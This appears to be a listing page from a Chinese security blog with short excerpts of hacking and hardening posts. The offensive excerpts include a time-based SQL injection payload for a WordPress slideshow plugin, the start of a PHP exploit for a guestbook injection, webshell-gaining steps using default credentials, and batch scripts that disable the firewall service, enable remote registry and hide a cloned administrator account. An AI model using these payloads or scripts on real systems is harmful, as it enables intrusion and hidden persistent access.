最好的入侵检测linux教程

  一:基本知识 1:常见UNIX版本: SCO UNIX,Sunos,Solaris,HP-UX,Digtal,Unix,IRIX,AIX,Linux,FreeBSD, 386BSD,A/UX,BSD,BSD-LITE,Goherent,Dynix,Hurd(GNN),InTeractive,Mach,Minix,Mks Toolkit,NetNSD,OSF/I,System V Un...

- 阅读全文 -

Vsftpd安全

一、基本设置 1、login banner [root@station2 ~]# vi /etc/vsftpd/vsftpd.conf ftpd_banner=Welcome to blah FTP service. banner_file=/etc/vsftpd/banner [root@station2 ~]# vi /etc/vsftpd/banner Hello ,welcome to F...

- 阅读全文 -

WordPress插件SH Slideshow

标题: WordPress SH Slideshow plugin 1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20 --------------- 缺陷代码分析 --------------- $result = $wpdb->query('delete from sh_slides where id = '.$_POS...

- 阅读全文 -

命令行下建立VPN

@echo off rem preparation sc config sharedaccess start= disabled net stop SharedAccess sc config remoteaccess start= auto net start RemoteAccess net start lanmanserver net start RemoteRegistry rem bui...

- 阅读全文 -

ASP构造注入点继续注入

首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去 <!--#include file="xx.asp"--> <% set rs=server.createobject("ADODB.recordset") id = request("id") strS...

- 阅读全文 -

114啦网址导航留言本注入漏洞

雨林木风的114啦网址导航程序留言文件存在注入漏洞。攻击者利用EXP 可以得到管理员帐号和MD5密码。 版本:<=1.5 EXP如下: <?php $sbcopyright=' ---------------------------------------- 114la feedback injection Vul Exploit By xZL Team: www.0kee.com 2...

- 阅读全文 -

帝国备份王(Empirebak)拿webshell

帝国备份王(Empirebak)简介 EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库. 可在 http://www.phome.net/ebak2008os/ 下载到 默认账号密码为 admin 123456 登陆后先备份一次数据 备份时可选择备份到的目录。。默认有个safemod 当然也可以是别的..这里以s...

- 阅读全文 -

复制并真正隐藏administrator帐号(完全批处理)

网上看了很多复制administator权限帐号的方法或者工具,比如建立admin$,所谓的隐藏帐号。 并复制administrator的权限。 其实这是暂时、一次性隐藏而已,服务器重启一下通过“计算机管理”或者net user 都能看到的。 本批处理根据服务器的情况,结合自己的研究,使用服务器本地iis帐号IUSR_计算机名, 设置密码位12345678(可以自己改一下批处理最后一行)。 这个来...

- 阅读全文 -

数据库挂马的解决方法

最近流行的数据库挂马的解决方法 前段时间,公司一个主要的网站数据库中个别表的数据经常被修改并挂马,由于网站是以前别人做的,代码有点乱,所以只看了与这几个表相关的文件代码。原因可能是接收参数的时候没有过滤危险字符,于是就加上了接受参数的格式化函数,数据库连接文件中也把接受参数时出现的“;”替换成“;”了。但是过了一天,又被挂马,分号替换没有起到作用。   于是搜索了一下,发现从3月份开始很多数据库S...

- 阅读全文 -